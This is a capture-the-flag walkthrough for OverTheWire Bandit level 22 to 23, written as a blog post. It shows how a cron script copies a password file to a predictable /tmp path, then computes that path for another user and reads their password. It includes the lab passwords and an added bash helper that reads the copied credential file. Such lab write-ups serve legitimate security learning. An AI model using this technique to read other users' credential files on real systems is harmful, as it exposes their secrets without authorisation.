Monday, December 15, 2014

Bandit Level 22 to Level 23

View a created script and use the info to run a custom command.

Host name is: bandit.labs.overthewire.org 
User: bandit22
password: Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Goal: A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Commands used for this level:
ls -l - list information about files in long listing format.
cat - view the contents of a file.
whoami - print the effective user name.

Step 1.
This looks exactly like the last level, so let's follow what we did there.
Type ls -l /etc/cron.d/
Just like last level, we see a cronjob_bandit23 file.

Step 2.
Let's cat that file.
cat /etc/cron.d/cronjob_bandit23
The cron entry tells us which command cron executes: /usr/bin/cronjob_bandit23.sh

Step 3.
Let's cat the script we found in step 2.
cat /usr/bin/cronjob_bandit23.sh
We get another bash script:
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

This script writes the contents of /etc/bandit_pass/$myname to /tmp/$mytarget, where $mytarget is the MD5 hash of the string "I am user $myname".

Step 4.
Again, like before, let's cat the copied file to see what it has in it.
cat /tmp/$mytarget
This time we get /tmp/: Permission denied
The output only shows /tmp/, so $mytarget is expanding to nothing: it is a variable set inside the script, not in our login shell, so our shell replaces it with an empty string and cat is pointed at the /tmp directory itself.
Let's go back and read our NOTE for the GOAL.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
So we need to understand how the script builds that variable, and the note suggests executing the script to see what it does.

Step 5.
Type /usr/bin/cronjob_bandit23.sh
We get the output: Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3

Step 6.
Let's cat that file.
cat /tmp/8169b67bd894ddbb4412f91573b38db3
We get our current password: Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Not what we want. We ran the script as bandit22, so it copied bandit22's password.


Step 7.
Let's go back and look at the cronjob_bandit23.sh script.
Type /usr/bin/cronjob_bandit23.sh
We get the output: Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
We missed something: it says bandit22, but we want the bandit23 password. Let's look at how the script works again.

myname=$(whoami)  
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

The first part, myname=$(whoami), sets myname to the name of the user running the script. Go ahead and do a whoami. It returns bandit22, the user we are logged in as. When cron runs this script, though, it runs it as bandit23, the user named in the cron entry, so at that point myname is bandit23 and the file it writes holds bandit23's password.

The second part, mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1), builds the output filename: it hashes the string "I am user $myname" with md5sum and keeps only the hash (cut drops the "  -" that md5sum prints after it). Nothing in that name is secret, so we can compute it ourselves for bandit23 instead of letting the script fill in our current user.
Type echo I am user bandit23 | md5sum | cut -d ' ' -f 1
We get 8ca319486bfbbc3663ea0fbe81326349 as output.

Step 8.
That hash is the filename cron used when it ran the script as bandit23, so let's cat that file.
Type cat /tmp/8ca319486bfbbc3663ea0fbe81326349
Look at that, we have our next level password:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
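The same computation as a reusable shell function, added here as an example (it is not part of the original post or of the Bandit scripts). It reproduces the mytarget logic from cronjob_bandit23.sh for any username, so the predicted path can be checked against what the script prints when run by hand, and it reads the file only if it exists and is readable. It assumes a Linux host with GNU md5sum and cut, as on the Bandit server; the function names are mine.

```bash
#!/bin/bash
# Added example, not from the original post: recompute the /tmp target
# that cronjob_bandit23.sh uses for a given user, without running the
# script. Assumes GNU coreutils (md5sum, cut) as on the Bandit host.

# Same pipeline as the script, with the username passed in instead of
# taken from whoami. The hashed string is "I am user <name>" plus the
# newline echo appends; cut keeps only the hash and drops the "  -"
# that md5sum prints after it.
target_for_user() {
    local name="$1"
    local hash
    hash=$(echo I am user "$name" | md5sum | cut -d ' ' -f 1)
    printf '/tmp/%s\n' "$hash"
}

# Print the copied password file for a user if cron has already written
# it and we are allowed to read it. Returns 1 if the file is missing or
# unreadable (for example, the cron job has not run yet) instead of
# letting cat print a confusing error.
read_target_for_user() {
    local path
    path=$(target_for_user "$1")
    if [ -r "$path" ]; then
        cat "$path"
    else
        printf '%s is not readable (has cron run the script as %s?)\n' "$path" "$1" >&2
        return 1
    fi
}

# Sanity check: the path we predict for the current user must match the
# one the script itself prints when we run it by hand. Running the script
# also copies our own password into /tmp, exactly as in step 5.
predicted_matches_script() {
    local script="${1:-/usr/bin/cronjob_bandit23.sh}"
    [ -x "$script" ] || return 1
    local printed
    printed=$("$script" | sed -n 's/.* to //p')
    [ "$printed" = "$(target_for_user "$(whoami)")" ]
}

# Usage on the Bandit host:
#   target_for_user bandit23       -> /tmp/8ca319486bfbbc3663ea0fbe81326349
#   read_target_for_user bandit23  -> prints bandit23's password if present
#   predicted_matches_script       -> exit 0 when our prediction is right
```

The point the function makes explicit is that the filename is derived only from a fixed string and a username, both public, so any local user can compute it in advance. Since /tmp is shared, the only thing protecting the copied password is the mode of the file the script creates, and on this level that mode lets bandit22 read it.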

